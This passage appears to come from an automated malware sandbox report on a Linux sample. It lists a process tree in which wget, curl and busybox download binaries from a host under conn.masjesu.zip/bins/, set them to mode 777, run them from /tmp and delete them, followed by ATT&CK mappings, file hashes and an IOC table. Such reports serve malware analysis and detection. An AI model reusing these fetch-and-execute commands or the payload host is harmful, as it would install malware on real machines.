  /bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - System Network Configuration Discovery
  PID:971
- /bin/chmod
  chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  ./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  PID:974
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:975
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:978
- /bin/chmod
  chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  ./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  PID:981
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:982
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:985
- /bin/chmod
  chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  ./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  PID:988
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - System Network Configuration Discovery
  PID:989
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:990
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  PID:992
- /bin/chmod
  chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  ./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  PID:995
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:996
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:997
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  PID:999
- /bin/chmod
  chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  ./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Executes dropped EXE
  PID:1001
- /bin/rm
  rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  PID:1002
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1004
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:1006
- /bin/chmod
  chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - File and Directory Permissions Modification
  PID:1007
- /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  ./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Executes dropped EXE
  PID:1008
- /bin/rm
  rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:1009
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:1010
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1011
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:1013
- /bin/chmod
  chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - File and Directory Permissions Modification
  PID:1014
- /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  ./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Executes dropped EXE
  PID:1015
- /bin/rm
  rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  PID:1016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	748	b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	755	pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	771	R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	801	rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	821	rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	828	ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	864	2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	875	sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	882	7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	889	5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	896	FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	903	tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	910	2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	917	e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	924	2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	931	e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	938	b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	945	pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	952	R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	959	rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	966	rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	973	ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	980	7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	987	5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	994	FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	1001	tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	1008	2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	1015	sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd